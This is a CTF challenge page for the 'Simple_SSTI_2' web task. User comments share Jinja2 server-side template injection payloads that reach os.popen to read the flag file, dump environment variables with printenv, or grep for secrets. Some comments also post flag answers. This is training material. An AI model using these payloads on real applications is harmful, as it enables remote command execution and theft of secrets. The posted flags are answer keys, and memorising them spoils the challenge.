Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15913
提  示:
描  述:
Simple_SSTI_2
评论
hao7 4月前

?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}

回复 1

超爱西西鸭 6月前

/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}

回复 1

pettter 7月前

?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}

回复 0

不会写代码的菜鸟 8月前

大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀

回复 1
qingchuan 7月前

因为没有import os,os是未定义的

回复 4

q1152874733 8月前

http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}

回复 0

Royic 9月前

/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}

回复 0

sz007 9月前

flag{6c85015e98aa08e245d15289704dfd8b}

回复 0

如你所愿 9月前

flag{5566f3c3cc3821f4a768384d2a387aae}

回复 0

109349 9月前

flag{2682096b09e88fe5f1faee731c0d36d7}

回复 0

z0shell 10月前

/?flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read()}}

回复 0
Masterk 9月前

这是怎么想出来的。。

回复 2

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

nina123 攻破了该题 1天前
33538626867 攻破了该题 1天前
qgys 攻破了该题 2天前
19189756057 攻破了该题 3天前
吃个大西瓜 攻破了该题 3天前
wywfzy 攻破了该题 4天前
wangzhuo 攻破了该题 4天前
当心眼睛 攻破了该题 5天前
小手冰凉 攻破了该题 6天前
c2F1eQ 攻破了该题 7天前
2183919422 攻破了该题 8天前
11111in 攻破了该题 8天前
lvxiaobu 攻破了该题 10天前
lulai 攻破了该题 10天前
Qiuqiu426 攻破了该题 11天前
13990684015 攻破了该题 15天前
3177919928 攻破了该题 15天前
ch2025 攻破了该题 15天前
VFlame 攻破了该题 15天前
wsyyyyy 攻破了该题 16天前
问题反馈